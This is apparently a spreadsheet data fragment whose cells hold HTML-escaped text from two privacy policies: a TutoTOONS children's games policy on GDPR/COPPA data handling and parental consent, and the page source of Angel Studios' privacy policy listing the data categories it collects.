    <t>We collect this Personal Data using cookies, automated event logs and other similar technologies.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;We collect Personal Data from third parties&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;We may receive Personal Data about you from third-party sources, i.e. from other companies and persons (see section Our third-party data controllers and processors).&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;HOW WE USE YOUR PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt; We will only use your Personal Data as permitted by law. Usually, we will use your Personal Data in the following circumstances:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Provide our services or&lt;p&gt;&lt;br&gt;Pursue legitimate business interests related to providing our services to you&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;In order to fulfil our obligations when you use our website or our mobile applications, e.g. to ensure that the Services are provided, to improve the Services, to identify subscribers and manage subscriptions, to personalize the content you use, to respond to your requests and inquiries._x005F_x000D_
              Also, in order to fulfil our legal obligations, we may ask for the child's parent or guardian's email when we must obtain the consent of parents or guardians to use the child's Personal Data (email and name)._x005F_x000D_
              When it is necessary to fulfil our contractual obligations or safeguard our legitimate interests, we use your Personal Data, e.g. to provide you with contextual advertising, to analyse your behaviour using our Services, to ensure the security and integrity of our Services.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-20"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Establish, exercise or defend legal claims&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-80"&gt;_x005F_x000D_
            &lt;p&gt;</t>
  </si>
  <si>
    <t>We may also use your Personal Data to enforce or defend our rights, protect your interests, prevent and/or detect fraud or deceptive behaviour.&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We will not use your data to provide you with behavioural advertising, as well as remarketing, profiling and automated decision making.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt; ON WHAT LEGAL BASIS WE USE PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;Generally, we collect and process your personal information only in order to fulfil our obligations to you, use it for legitimate interests and protect your rights (support for the internal operations), or if we have your consent to do so._x005F_x000D_
          Below, we provide you with information on the purposes and grounds for usage of your Personal Data.&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
        &lt;table class="table"&gt;_x005F_x000D_
          &lt;col width="30%"&gt;_x005F_x000D_
          &lt;col width="20%"&gt;_x005F_x000D_
          &lt;col width="50%"&gt;_x005F_x000D_
          &lt;thead&gt;_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;th&gt;Activity&lt;/th&gt;_x005F_x000D_
              &lt;th&gt;Data type&lt;/th&gt;_x005F_x000D_
              &lt;th&gt;Legal basis for data processing&lt;/br&gt;according to GDPR / COPPA&lt;/th&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
          &lt;/thead&gt;_x005F_x000D_
          &lt;tbody&gt;_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Manage and protect our website and our mobile applications_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                 &lt;b&gt;Contact Data&lt;br&gt;Technical Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
               &lt;td&gt;_x005F_x000D_
                (a) Necessary for our legitimate interests (GDPR)&lt;br&gt;_x005F_x000D_
                (b) Necessary for support for the internal operations (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Provide Services, improve Services, customize Services for your individual needs_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Technical Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                (a) Necessary for fulfilling our contractual obligations (GDPR)&lt;br&gt;_x005F_x000D_
                (b) Necessary for support for the internal operations (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Identify games subscribers and manage games subscriptions (only if you get subscription plan)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Contact Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                (a) Necessary for fulfilling our contractual obligations (GDPR)&lt;br&gt;_x005F_x000D_
                (b) Necessary for fulfilling our contractual obligations (GDPR)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Submit contextual advertising to you, analyse your behaviour using our Services_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Technical Data&lt;br&gt;Usage Data&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                a) Necessary for our legitimate interests and for fulfilling our contractual obligations (GDPR)&lt;br&gt;_x005F_x000D_
                b) Necessary for support for the internal operations (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Reply to your applications, requests, notifications_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
               &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Contact Data&lt;br&gt;Contact data such as email or phone number&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
               &lt;td&gt;_x005F_x000D_
                a) Necessary for fulfilling our contractual obligations and for legitimate interests (GDPR)&lt;br&gt;_x005F_x000D_
                If a child under the age of 13 years old in the USA or under the age of 16 years old in the EU has contacted us through email, and we need to communicate with the child more than once to resolve the query, we will ask the child to provide us with the child's parent or guardian's email._x005F_x000D_
                Then we will send the parent or guardian a notice telling us that his/her child has contacted us.</t>
  </si>
  <si>
    <t>If we do not obtain parental consent after a reasonable time from the date of the data collection, we will delete such data from our records._x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
            &lt;tr&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                Get the child's parent's or guardian's consent_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
               &lt;td&gt;_x005F_x000D_
                &lt;b&gt;Contact Data&lt;br&gt;(email)&lt;/b&gt;_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
              &lt;td&gt;_x005F_x000D_
                a) Necessary to comply with our legal obligations (GDPR)&lt;br&gt;_x005F_x000D_
                b) Exception to prior parental consent (COPPA)_x005F_x000D_
              &lt;/td&gt;_x005F_x000D_
            &lt;/tr&gt;_x005F_x000D_
_x005F_x000D_
          &lt;/tbody&gt;_x005F_x000D_
        &lt;/table&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We will use your Personal Data for the purposes for which we have collected them, unless we reasonably believe that we must use it for another purpose that is compatible with the original_x005F_x000D_
        &lt;p&gt;Please note that in cases where we must process Personal Data when required by law, we may process your Personal Data without your knowledge or consent.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;TUTOTOONS SUBSCRIPTION (TUTOCLUB)&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;If you would like to curated selection of TutoTOONS games for your child that cherish creativity and help develop useful, we will need to identify you by creating a subscriber's account._x005F_x000D_
           In order to get access to TutoTOONS games subscription, a child's parent or guardian is required to agree to our Terms of Use and Privacy Policy as well as login by choosing a preferable login method (platform you’re using to play our games, such as Google Play, Apple App Store, etc.).&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;/p&gt;_x005F_x000D_
      &lt;p&gt;_x005F_x000D_
_x005F_x000D_
      &lt;/p&gt;_x005F_x000D_
        &lt;p&gt;&lt;b&gt;Personal data we collect&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;If you decide to get a TutoTOONS games subscription for your child, we may collect and use some of your personal data, such as chosen login method, email address, current subscription plan, billing, connected devices, unique ID, advertisement ID and device ID.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt; We are not collecting or storing any of your financial data as management of any payments is done by the respective platform you are using to download our apps from, such as iTunes, Google play, Amazon or others.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;By creating your Tutoclub account, you may agree to receive our newsletters or other emails promoting any special offer(s).</t>
  </si>
  <si>
    <t xml:space="preserve">You can always opt out from receiving special promotions or marketing correspondence from us by unsubscribing as noted in the respective email correspondence.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;&lt;b&gt;How and why we use this data&lt;/b&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We will use this data only to authenticate a user and manage the user’s subscription (e.g. to determine on how many devices subscription has been activated). We process your personal data ourselves, therefore personal information is not disclosed to any third party.&lt;/p&gt;_x005F_x000D_
        &lt;p&gt;Please note that you have the right to cancel your subscription anytime, however your personal data collected before subscription cancellation will be stored for a period of three years in order to comply with our legal obligations and protect our legal interests.&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;OUR COOKIE POLICY&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;When you use our services, we may use industry-wide technologies such as cookies and/or other technologies, hardware-based device identifiers, flash cookies, operating system-based identifiers and web beacons.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;Cookies are small text files that we place in visitors’ computer browsers to store their preferences._x005F_x000D_
          </t>
  </si>
  <si>
    <t>The cookies are created for each session, they do not include or collect any information about you other than your session key, and they are removed as soon as the session ends (usually done automatically by your web browser).&lt;/p&gt;_x005F_x000D_
_ x000D_
        &lt;p&gt;You can disable cookies on your device or set your device to alert you when cookies are being sent to your device.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt;If you do not accept, block or erase cookies, or change the settings, your online experience may be limited.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;p&gt; We may also use certain third-party cookies (e.g. Google Authentication).</t>
  </si>
  <si>
    <t>These are different kinds of cookies that are stored on your computer by third parties. This kind of cookie is only read (and is not altered by the Service) each time you use our Services. Third party cookies store only Usage Data, such as the different pages you have visited strictly within the Service (such the “About” page, the “Contact Us” page, the duration of your browsing session, etc.).&lt;/p&gt;_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;WHO MAY ACCESS YOUR PERSONAL DATA&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;p&gt;</t>
  </si>
  <si>
    <t>We may share your personal information with a few selected third parties, such as:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;ul&gt;_x005F_x000D_
          &lt;li&gt;Companies of our group, third-party service providers and other partners (e.g. to ensure the provision of our Services, to provide services or to improve our Services security), as well as to those who otherwise process Personal Data for the purposes specified in this Privacy Policy. Here is a list of our current service providers and partners (see section Our third-party data controllers and processors).&lt;/li&gt;_x005F_x000D_
          &lt;li&gt;To any competent law enforcement authority, regulatory authority, government agency, court, or other third party, if we consider that disclosure is necessary (i) in accordance with applicable laws or regulations, (ii) to exercise or to protect our rights, or (iii) to protect our or any other person's interests;&lt;/li&gt;_x005F_x000D_
          &lt;li&gt;A potential or actual buyer (and its representatives and advisers) involved in the purchase, merger or acquisition of a proposed or actual any part of our business, provided that we inform the buyer that it will have to use your Personal Data only for the purposes specified in this Privacy Policy;&lt;/li&gt;_x005F_x000D_
          &lt;li&gt;Any other person with your consent to disclose information.&lt;/li&gt;_x005F_x000D_
        &lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
      &lt;/div&gt;_x005F_x000D_
_x005F_x000D_
      &lt;button class="accordion"&gt;&lt;b&gt;INFORMATION ABOUT THIRD-PARTY DATA CONTROLLERS AND PROCESSORS&lt;/b&gt;&lt;/button&gt;_x005F_x000D_
      &lt;div class="panel"&gt;_x005F_x000D_
        &lt;div class="row"&gt;_x005F_x000D_
          &lt;div class="column column-width-40"&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;KIDOZ &lt;/b&gt;&lt;/p&gt;_x005F_x000D_
          &lt;/div&gt;_x005F_x000D_
          &lt;div class="column column-width-60"&gt;_x005F_x000D_
            &lt;p&gt;KIDOZ is an advertising service provided by KIDOZ Ltd. KIDOZ uses Personal and Non-Personal Data only for internal purposes.&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;&lt;b&gt;Legal basis of processing: &lt;/b&gt;legitimate interests (support for internal operations).&lt;/p&gt;_x005F_x000D_
            &lt;p&gt;Processing location: USA&lt;br&gt;_x005F_x000D_
               Privacy policy: &lt;a class="underline" href="https://kidoz.net/website-and-kidoz-sdk-privacy-policy"&gt;https://kidoz.net/website-and-kidoz-sdk-privacy-policy&lt;/a&gt;&lt;br&gt;_x005F_x000D_
              Address: KIDOZ, PO BOX 8517, Poleg Industrial park, Netanya, Israel&lt;br&gt;_x005F_x000D_
              Phone: +972-9-7716444&lt;br&gt;_x005F_x000D_
              Contact: &lt;a class="underline" href="mailto:support@kidoz.com"&gt;support@kidoz.com&lt;/a&gt;_x005F_x000D_
            &lt;/p&gt;_x005F_x000D_
          &lt;/</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en" class="overflow-x-hidden scroll-smooth"&gt;&lt;head&gt;&lt;meta charSet="utf-8"/&gt;&lt;title&gt;Angel Studios: Free, Wholesome Movies &amp;amp; Shows&lt;/title&gt;&lt;meta name="robots" content="index,follow"/&gt;&lt;meta name="description" content="Get free unlimited access to stories that amplify light through high quality entertainment and family-friendly content. "/&gt;&lt;meta name="twitter:card" content="summary_large_image"/&gt;&lt;meta name="twitter:site" content="@AngelStudiosInc"/&gt;&lt;meta name="twitter:creator" content="@AngelStudiosInc"/&gt;&lt;meta property="og:title" content="Angel Studios: Free, Wholesome Movies &amp;amp; Shows"/&gt;&lt;meta property="og:description" content="Get free unlimited access to stories that amplify light through high quality entertainment and family-friendly content."/&gt;&lt;meta</t>
  </si>
  <si>
    <t>property="og:url" content="https://www.angel.com/legal/privacy"/&gt;&lt;meta property="og:type" content="website"/&gt;&lt;meta property="og:image" content="https://images.angelstudios.com/image/upload/v1671000066/angel-studios/angel-open-graph-221212.jpg"/&gt;&lt;meta property="og:image:alt" content="Angel Studios"/&gt;&lt;meta property="og:image:width" content="1200"/&gt;&lt;meta property="og:image:height" content="630"/&gt;&lt;meta property="og:locale" content="en_US"/&gt;&lt;meta property="og:site_name" content="Angel Studios"/&gt;&lt;link rel="icon" href="/favicon.ico"/&gt;&lt;link rel="apple-touch-icon" href="https://images.angelstudios.com/image/upload/w_180,h_180/v1652826230/angel-app/for-your-consideration/angel-logo.jpeg" sizes="180x180"/&gt;&lt;link rel="apple-touch-icon" href="https://images.angelstudios.com/image/upload/w_192,h_192/v1652826230/angel-app/for-your-consideration/angel-logo.jpeg" sizes="192x192"/&gt;&lt;script type="application/ld+json"&gt;{"@context":"https://schema.org","url":"https://www.angel.com/legal/privacy","image":"https://images.angelstudios.com/image/upload/v1637340036/angel-studios/logos/Angel-logo-black_4x_2.png","inLanguage":"en","name":"Angel Studios: Free, Wholesome Movies &amp;amp; Shows","headline":"Angel Studios: Free, Wholesome Movies &amp;amp; Shows","description":"Get free unlimited access to stories that amplify light through high quality entertainment and family-friendly content. ","isPartOf":{"url":"https://www.angel.com/","name":"Angel Studios","publisher":{"name":"Angel Studios","founder":[{"givenName":"Neal","familyName":"Harmon","@type":"Person"},{"givenName":"Jeff","familyName":"Harmon","@type":"Person"},{"givenName":"Jordan","familyName":"Harmon","@type":"Person"},{"givenName":"Daniel","familyName":"Harmon","@type":"Person"},{"givenName":"Benton","familyName":"Crane","@type":"Person"}],"foundingDate":"2021","keywords":["stream","streaming","video","original","originals","studio","series","media","crowdfunding","dry bar","dry bar comedy","chosen","the chosen","tuttle","tuttle twins","wingfeather","wingfeather saga"],"legalName":"Angel Studios, Inc.","location":{"address":"295 W Center St Suite A, Provo, UT 84601","@type":"Place"},"logo":"https://images.angelstudios.com/image/upload/v1637340036/angel-studios/logos/Angel-logo-black_4x_2.jpg","sameAs":["https://wikipedia.org/wiki/Angel_Studios","https://www.facebook.com/AngelStudios.inc","https://twitter.com/AngelStudiosInc","https://www.instagram.com/angelstudios_inc/","https://www.youtube.com/channel/UCQIjTyWmLEdsfqMQay0yGMA","https://www.linkedin.com/angel-studios-page","https://www.imdb.com/search/title/?companies=co0145927","https://www.tiktok.com/@angelstudiosinc"],"slogan":"Be part of stories that Amplify Light.</t>
  </si>
  <si>
    <t>","url":"https://www.angel.com","@id":"https://www.angel.com/#organization","@type":"Organization"},"@id":"https://www.angel.com/#website","@type":"WebSite"},"@id":"https://www.angel.com/legal/privacy#webpage","@type":"WebPage"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"@context":"https://schema.org","target":{"urlTemplate":"ios-app://1473663873/https/www.angel.com/","@type":"EntryPoint"},"@type":"ViewAction"}&lt;/script&gt;&lt;script type="application/ld+json"&gt;{"@context":"https://schema.org","target":{"urlTemplate":"android-app://com.vidangel.thechosen/https/www.angel.com/","@type":"EntryPoint"},"@type":"ViewAction"}&lt;/script&gt;&lt;meta name="viewport" content="width=device-width, minimum-scale=1.0, initial-scale=1, maximum-scale=1.0"/&gt;&lt;meta name="next-head-count" content="24"/&gt;&lt;link rel="icon" href="/favicon.ico"/&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"/&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge"/&gt;&lt;meta name="mobile-web-app-capable" content="yes"/&gt;&lt;meta name="apple-mobile-web-app-capable" content="yes"/&gt;&lt;script async="" src="https://cmp.osano.com/16A4MgTIwm4CY2fAD/7a4204c4-eca7-4ec0-a821-ca8b4cd589a3/osano.js"&gt;&lt;/script&gt;&lt;style&gt;.osano-cm-widget {display: none;}&lt;/style&gt;&lt;script async="" src="https://www.googletagmanager.com/gtag/js?id=G-H8GZ50XW88"&gt;&lt;/script&gt;&lt;script&gt;window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());
    gtag('config', 'G-H8GZ50XW88', {
        page: window.location.pathname
    });&lt;/script&gt;&lt;link rel="preload" href="/_next/static/css/7a506eef9405c687.css" as="style"/&gt;&lt;link rel="stylesheet" href="/_next/static/css/7a506eef9405c687.css" data-n-g=""/&gt;&lt;noscript data-n-css=""&gt;&lt;/noscript&gt;&lt;script defer="" nomodule="" src="/_next/static/chunks/polyfills-c67a75d1b6f99dc8.js"&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/webpack-50c73bf4e6bc65c0.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/framework-79bce4a3a540b080.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/main-01e79fe54aaea383.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/pages/_app-45c04153d63739c4.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/chunks/pages/legal/privacy-1e38239f77cd73e5.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/TVFTJ7Qea22MFzwLm1y0e/_buildManifest.js" defer=""&gt;&lt;/script&gt;&lt;script src="/_next/static/TVFTJ7Qea22MFzwLm1y0e/_ssgManifest.js" defer=""&gt;&lt;/script&gt;&lt;/head&gt;&lt;body class="bg-gray-950"&gt;&lt;h2 class="hidden"&gt;Angel Studios&lt;/h2&gt;&lt;div id="__next" data-reactroot=""&gt;&lt;div class="bg-white text-black text-justify py-20"&gt;&lt;div class="px-4 sm:px-8 md:px-12 xl:px-16 mx-auto max-w-[1420px]"&gt;&lt;div class="flex flex-col items-center p-10 gap-4"&gt;&lt;h1 class="font-bold text-[1.3rem] md:text-[2rem] text-center"&gt;&lt;p data-cy="company"&gt;Angel Studios&lt;/p&gt;&lt;p data-cy="privacy-policy-header"&gt;Privacy Policy&lt;/p&gt;&lt;/h1&gt;&lt;p&gt;Updated: November 29, 2022&lt;/p&gt;&lt;p&gt;Welcome to Angel Studios!</t>
  </si>
  <si>
    <t>Angel Studios, Inc. (“Angel Studios” or “we”, “us” or “our”) respect your privacy. This Privacy Policy (“Policy”) describes how we collect, use, protect and disclose Personal Data in connection with your use of our websites including, without limitation,&lt;!-- --&gt; &lt;a data-cy="home-link" class="underline" href="/home"&gt;https://www.angel.com&lt;/a&gt;,&lt;!-- --&gt; &lt;a class="underline" href="/market"&gt;/market&lt;/a&gt;, and any other website that includes a link to this Privacy Policy, along with the features, functionalities, applications, browser extensions and other services available through those websites (collectively, our “Websites”); your use of our mobile applications distributed on our Websites and the Google Play Store and Apple App Store, including, without limitation, Angel Studios, Angel Marketplace, The Chosen, Dry Bar Comedy, and any other mobile application that includes a link to this Privacy Policy, along with all features, functionalities, applications, browser extensions and other services available through our mobile applications (collectively, our “Apps”); and personal information we obtain from any third party site connected to our Websites or our Apps or where we post content or invite your feedback or participation, including, without limitation, Facebook, Twitter, YouTube, and LinkedIn (collectively, “Third Party Sites” and, together with our Websites and Apps, our “Platform”). This Policy also applies to any personal information we collect or receive in connection with any other interactions we have with you outside of our Platform in connection with our business operations (our “Operations”).</t>
  </si>
  <si>
    <t>“NFT” in this Policy means a non-fungible token or similar digital item implemented on a blockchain (such as the Ethereum blockchain or Angel’s Sidechain), which uses smart contracts to link to or otherwise be associated with certain content or data.&lt;/p&gt;&lt;p&gt;PLEASE NOTE, THIS POLICY DOES NOT APPLY TO THE COLLECTION, USE, PROTECTION, OR DISCLOSURE OF PERSONAL DATA BY OUR AFFILIATE, VAS PORTAL, LLC (“ANGEL FUNDING”), INCLUDING, WITHOUT LIMITATION, THROUGH OR IN CONNECTION WITH THE ANGEL FUNDING WEBSITE, LOCATED AT&lt;!-- --&gt; &lt;a href="https://invest.angel.com/" target="_blank" rel="external" data-cy="invest-link" class="underline"&gt;https://invest.angel.com/&lt;/a&gt;, OR ANGEL FUNDING’S OPERATIONS. ANGEL FUNDING’S PRACTICES WITH RESPECT TO THE PERSONAL DATA IT COLLECTS ARE PROVIDED IN THE ANGEL FUNDING PRIVACY POLICY, AVAILABLE AT&lt;!-- --</t>
  </si>
  <si>
    <t>&gt; &lt;a href="https://invest.angel.com/privacy" target="_blank" rel="external" data-cy="invest-privacy-link" class="underline"&gt;https://invest.angel.com/privacy&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;You can access and interact with our Platform in many ways, including from a computer or mobile device. This Policy applies regardless of how you access or interact with our Platform. Depending on how you interact with our Platform, there may be some cases where we need to provide you with additional information about how we collect, use, protect or disclose your Personal Data and/or what options you have regarding our collection, use or disclosure of your Personal Data.</t>
  </si>
  <si>
    <t>We may provide this additional information through notices on our Platform or via direct communications with you. If we do this, unless we tell you otherwise, the additional information provided in those notices will apply in addition to what is described in this Policy.&lt;/p&gt;&lt;p class="font-semibold"&gt;Please read this Policy carefully. If you do not want us to collect, use or disclose your Personal Data in the ways described in this Policy, please do not use or otherwise interact with our Platform, provide us with your Personal Data or authorize any third party to make your Personal Data available to us.</t>
  </si>
  <si>
    <t>By using or interacting with our Platform, you acknowledge that you understand that we may use your Personal Data as described in this Policy. Please note, as described in this Policy, we may receive your Personal Data from third parties that have not expressly told you that they will provide your Personal Data to us. If you have any questions about how we collect, use, protect or disclose your Personal Data in connection with our Platform, please contact us by email at&lt;!-- --&gt; &lt;a data-cy="support-link" class="underline" href="mailto:privacy@angel.com"&gt;privacy@angel.com&lt;/a&gt;.&lt;/p&gt;&lt;ol class="list-decimal list-inside"&gt;&lt;li&gt;&lt;span class="font-semibold"&gt;PERSONAL DATA AND OTHER INFORMATION WE COLLECT&lt;/span&gt;&lt;p&gt;Our primary goals in collecting Personal Data are to provide and improve our Platform, conduct our Operations, communicate with people and enable visitors to our Platform to easily navigate and enjoy them.&lt;/p&gt;&lt;p</t>
  </si>
  <si>
    <t>class="mt-4"&gt;When we refer to “Personal Data” in this Policy, we mean information that identifies, relates to, describes or is reasonably capable of being associated with, or could reasonably be linked, directly or indirectly, to a specific person. This might be information that directly identifies someone, such as their name, or it may be information that identifies someone only when combined with other information available to us, such as a person’s activity on our Platform when associated with their username. Please note, except as provided under applicable laws, Personal Data does not include information that is publicly available through government records or information that has been deidentified or aggregated in a way that it cannot be used to identify a specific individual.&lt;/p&gt;&lt;ol class="list-[lower-roman] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;Categories of Personal Data We Collect&lt;/span&gt;</t>
  </si>
  <si>
    <t>Depending on how you access, use or otherwise interact with our Platform, we, or third parties acting on our behalf, may collect the following categories of Personal Data about you:&lt;ol class="list-[lower-alpha] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;Identifiers and contact information, such as your real name, alias, email address, telephone number, postal address, physical address, unique personal identifier, government-issued identification number, online identifier, IP address and other similar information;&lt;/li&gt;&lt;li class="mt-4"&gt;Demographic information, such as your age, gender, ethnicity, national origin and other similar information;&lt;/li&gt;&lt;li class="mt-4"&gt;Financial information, such as your bank account number, credit card number, debit card number, cryptocurrency wallet information and other similar information;&lt;/li&gt;&lt;li class="mt-4"&gt;Transactional information, such as information about purchases you have made or participated in through our Platform or Operations and other similar information;&lt;/li&gt;&lt;li class="mt-4"&gt;Internet and other similar network activity information, such as your browsing history, search history, interactions with the online portions of our Platform and online advertisements and other similar information;&lt;/li&gt;&lt;li class="mt-4"&gt;Communication information, such as information contained in voice mails, chats, emails and other similar information;&lt;/li&gt;&lt;li class="mt-4"&gt;Location information, such as where you live, where you are located and other similar information;&lt;/li&gt;&lt;li class="mt-4"&gt;Preference information, such as your interests, hobbies, opinions and other similar information; and&lt;/li&gt;&lt;li class="mt-4"&gt;Other information you provide to us.&lt;/li&gt;&lt;/ol&gt;&lt;/li&gt;&lt;li class="mt-4"&gt;&lt;span class="font-semibold"&gt;Other Information We Collect&lt;/span&gt; We, or third parties acting on our behalf, collect certain information about the device you use when you visit or otherwise interact with our Platform and through the use of cookies, pixels and other web technologies (collectively, “Usage Data”).</t>
  </si>
  <si>
    <t>Usage Data, by itself, generally does not identify the specific person using the device that generated it. This means that Usage Data usually will not be considered Personal Data and our use of such Usage Data is not subject to this Policy unless required pursuant to applicable law. However, if we link Usage Data directly with other Personal Data or other information that could identify you, we will treat the linked Usage Data as Personal Data and use the linked Usage Data as described in this Policy.&lt;p class="mt-4"&gt;Depending on how you interact with our Platform, the Usage Data that we, or third parties acting on our behalf, may collect may include:&lt;/p&gt;&lt;ol class="list-[lower-alpha] list-inside ml-4"&gt;&lt;li class="mt-4"&gt;Device information, such as the IP address, general geographic location, operating system, browser type, language preferences, mobile phone number, device identifier and other similar information associated with a device used to access, use or interact with our Platform;&lt;/li&gt;&lt;li class="mt-4"&gt;Information about online interactions with our Platform, such as links that are clicked, pages or screens that are viewed, access and session times, interactions with emails we send and other similar information associated with a device used to access, use or interact with our Platform;&lt;/li&gt;&lt;li class="mt-4"&gt;Information about internet and network activity, such as websites visited, search engine results and similar information associated with a device that accesses or interacts with our Platform online;&lt;/li&gt;&lt;li class="mt-4"&gt;Other information automatically collected by cookies and other technologies on our Platform;&lt;/li&gt;&lt;li</t>
  </si>
  <si>
